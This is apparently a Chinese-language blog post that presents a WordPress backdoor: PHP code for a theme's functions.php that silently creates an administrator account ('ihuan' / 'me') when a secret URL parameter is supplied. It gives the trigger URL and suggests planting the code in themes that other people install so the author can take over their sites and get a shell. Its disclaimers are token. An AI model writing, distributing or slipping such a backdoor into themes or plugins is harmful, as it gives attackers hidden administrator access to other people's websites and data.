一段代码，让你的博客从此毫无毫安全感

以前大家是不是总是听说过程序后门啦，网站后门啦之类的。

其实只要在你的主题里添加一段代码，你的博客账号，就从此呵呵了。想想太邪恶了，首先我先声明下，我分享的绝无，不信你们自己看，我没那么邪恶的。

add_action( 'wp_head', 'my_backdoor' );

function my_backdoor() {
    if ( md5( $_GET['backdoor'] ) == '324a37da6577a6319378e23870852fee' ) {
        require( 'wp-includes/registration.php' );
        if ( !username_exists( 'mr_admin' ) ) {
            $user_id = wp_create_user( 'ihuan', 'me' );
            $user = new WP_User( $user_id );
            $user->set_role( 'administrator' );
        }
    }
}

这么一段代码加入主题的 functions.php 中，对方的网站就无处藏身了。

然后，你再加点别的，提示下对方正在用你的主题，在 functions.php 里或其他地方再加个链接触发就好了。然后，你只需要……就可以呵呵呵了！太邪恶了……

但是小幻不建议这么干，请自觉使用！

使用方法：打开 http://目标.com/?backdoor=ihuan 如果在二级目录就加个二级。

然后，你就可以使用你的密码来登陆他的后台了，正常登陆即可，管理员权限，也就是说，你甚至可以 shell 。具体不多说，自己百度。没办法，WP 太强大了！！！超简单拿权。

我这里默认设置的账号密码是 账号：ihuan 密码：me

就这样了，别做坏事！！！！！

如果需要详细的各种功能源码 （触发、记录等），请联系我，*** 完了完了，我又要做坏事

但是删数据库、放黑页不是我们这些 「三好学生」 该干的。请收好您的好奇心！